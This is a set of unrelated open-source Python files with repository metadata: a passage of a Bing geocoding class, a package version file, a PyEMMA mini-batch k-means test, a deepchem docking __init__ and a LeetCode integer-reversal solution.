'o': 'json',
'inclnb': 1,
'key': self._get_api_key(bing_key, **kwargs),
'maxResults': 1
}
self._initialize(**kwargs)
def _catch_errors(self):
status = self.parse['statusDescription']
if not status == 'OK':
self.error = status
def _exceptions(self):
# Build intial Tree with results
sets = self.parse['resourceSets']
if sets:
resources = sets[0]['resources']
if resources:
self._build_tree(resources[0])
for item in self.parse['geocodePoints']:
self._build_tree(item)
@property
def lat(self):
coord = self.parse['point']['coordinates']
if coord:
return coord[0]
@property
def lng(self):
coord = self.parse['point']['coordinates']
if coord:
return coord[1]
@property
def address(self):
return self.parse['address'].get('formattedAddress')
@property
def housenumber(self):
if self.street:
expression = r'\d+'
pattern = re.compile(expression)
match = pattern.search(self.street, re.UNICODE)
if match:
return match.group(0)
@property
def street(self):
return self.parse['address'].get('addressLine')
@property
def neighborhood(self):
return self.parse['address'].get('neighborhood')
@property
def city(self):
return self.parse['address'].get('locality')
@property
def state(self):
return self.parse['address'].get('adminDistrict')
@property
def country(self):
return self.parse['address'].get('countryRegion')
@property
def quality(self):
return self.parse.get('entityType')
@property
def accuracy(self):
return self.parse.get('calculationMethod')
@property
def postal(self):
return self.parse['address'].get('postalCode')
@property
def bbox(self):
if self.parse['bbox']:
south = self.parse['bbox'][0]
north = self.parse['bbox'][2]
west = self.parse['bbox'][1]
east = self.parse['bbox'][3]
return self._get_bbox(south, west, north, east)
if __name__ == '__main__':
g = Bing('453 Booth Street, Ottawa Ontario')
g.debug()
|
akittas/geocoder
|
geocoder/bing.py
|
Python
|
mit
| 3,453
|
__version__ = '1.2.0'
__author__ = 'Dormy Mo'
|
DormyMo/SpiderKeeper
|
SpiderKeeper/__init__.py
|
Python
|
mit
| 46
|
from __future__ import absolute_import
import unittest
from unittest import TestCase
import numpy as np
from pyemma.coordinates.api import cluster_mini_batch_kmeans
class TestMiniBatchKmeans(TestCase):
def test_3gaussian_1d_singletraj(self):
# generate 1D data from three gaussians
X = [np.random.randn(200) - 2.0,
np.random.randn(300),
np.random.randn(400) + 2.0]
X = np.hstack(X)
kmeans = cluster_mini_batch_kmeans(X, batch_size=0.5, k=100, max_iter=10000)
cc = kmeans.clustercenters
assert (np.any(cc < 1.0))
assert (np.any((cc > -1.0) * (cc < 1.0)))
assert (np.any(cc > -1.0))
def test_3gaussian_2d_multitraj(self):
# generate 1D data from three gaussians
X1 = np.zeros((200, 2))
X1[:, 0] = np.random.randn(200) - 2.0
X2 = np.zeros((300, 2))
X2[:, 0] = np.random.randn(300)
X3 = np.zeros((400, 2))
X3[:, 0] = np.random.randn(400) + 2.0
X = [X1, X2, X3]
kmeans = cluster_mini_batch_kmeans(X, batch_size=0.5, k=100, max_iter=10000)
cc = kmeans.clustercenters
assert (np.any(cc < 1.0))
assert (np.any((cc > -1.0) * (cc < 1.0)))
assert (np.any(cc > -1.0))
if __name__ == '__main__':
unittest.main()
|
trendelkampschroer/PyEMMA
|
pyemma/coordinates/tests/test_mini_batch_kmeans.py
|
Python
|
bsd-2-clause
| 1,309
|
"""
Imports all submodules
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from deepchem.dock.pose_generation import PoseGenerator
from deepchem.dock.pose_generation import VinaPoseGenerator
from deepchem.dock.pose_scoring import PoseScorer
from deepchem.dock.pose_scoring import GridPoseScorer
from deepchem.dock.docking import Docker
from deepchem.dock.docking import VinaGridRFDocker
from deepchem.dock.docking import VinaGridDNNDocker
from deepchem.dock.binding_pocket import ConvexHullPocketFinder
from deepchem.dock.binding_pocket import RFConvexHullPocketFinder
|
bowenliu16/deepchem
|
deepchem/dock/__init__.py
|
Python
|
gpl-3.0
| 637
|
"""
Reverse digits of an integer.
Example1: x = 123, return 321
Example2: x = -123, return -321
click to show spoilers.
Have you thought about this?
Here are some good questions to ask before coding. Bonus points for you if you
have already thought through this!
If the integer's last digit is 0, what should the output be? ie, cases such as
10, 100.
Did you notice that the reversed integer might overflow? Assume the input is a
32-bit integer, then the reverse of 1000000003 overflows. How should you
handle such cases?
For the purpose of this problem, assume that your function returns 0 when
the reversed integer overflows.
"""
class Solution:
# @param {integer} x
# @return {integer}
def reverse(self, x):
if x < 10 and x >= 0:
return x
s = str(x)[::-1].lstrip('0')
result = 0
if s[-1] == '-':
result = int(s[-1] + s[:-1])
else:
result = int(s)
return result
|
fantuanmianshi/Daily
|
LeetCode/reverse_integer.py
|
Python
|
mit
| 970
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.